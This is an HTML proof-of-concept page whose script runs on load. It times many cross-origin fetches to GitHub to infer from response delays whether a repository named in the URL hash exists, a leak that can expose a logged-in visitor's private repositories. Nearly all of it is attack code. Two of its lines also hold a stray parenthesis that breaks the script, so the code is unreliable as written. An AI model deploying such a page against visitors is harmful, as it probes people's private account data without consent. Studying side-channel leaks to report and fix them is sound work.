<!DOCTYPE html>
<html>
    <body>
        <p id="status">Please wait...</p>

        <p id="404-result"></p>
        <p id="repo-result"></p>

        <script>
            "use strict";

            function getCacheBustQueryString() {
                // Generate random string of chars
                return `?${window.crypto.getRandomValues(new Uint32Array(1))[0]}`;
            }

            function updateStatus(msg) {
                document.getElementById('status').innerText = msg;
            }

            async function getRequestTime(u) {
                const t1 = Date.now();
                try {
                    await fetch(u);
                } catch (_) {
                    // We know fetch will CORS error here. That's okay, we do not care.
                }
                return Date.now() - t1;
            }

            async function getAverageRequestTime(u) {
                const a = [];
                for (let i = 0; 100 > i; i++) {
                    a.push(await getRequestTime(`${u}${getCacheBustQueryString()}`));
                }
                return a.reduce((a, b) => a + b, 0) / a.length;
            } 

            (async () => {
                // Try and get the repo from the window hash.
                const hash = window.location.hash.substr(1);
                if (hash === "") {
                    updateStatus("Please give the repo as a document hash in the format x/y");
                    return;
                }

                // Write that the POC is started.
                updateStatus("POC started - this might take a minute");

                // Get the data for a lot of actual 404's.
                const time404 = await getAverageRequestTime("https://github.com/jakemakesstuff/thisrepodoesnotexist");

                document.getElementById('404-result').innerText = `404 time: ${time404}ms`;
                updateStatus("404 check complete. Testing for existence of provided repo  - this might take a minute");

                // Get the time for a repo that might exist.
                const timeExists = await getAverageRequestTime(`https://github.com/${hash}`);

                // If the request for the repo to test against takes longer than <ratio> * <404 time>, the repo likely exists!
                const repoExistsTimingRatio = 1.125;

                // Log everything to the document thus far.
                if (timeExists / time404 > repoExistsTimingRatio) {
                    document.getElementById('repo-result').innerText = `Repo probably exists (time: ${timeExists}ms)`);
                } else {
                    document.getElementById('repo-result').innerText = `Repo probably doesn't exist (time: ${timeExists}ms)`);
                }
            })();
        </script>
    </body>
</html>
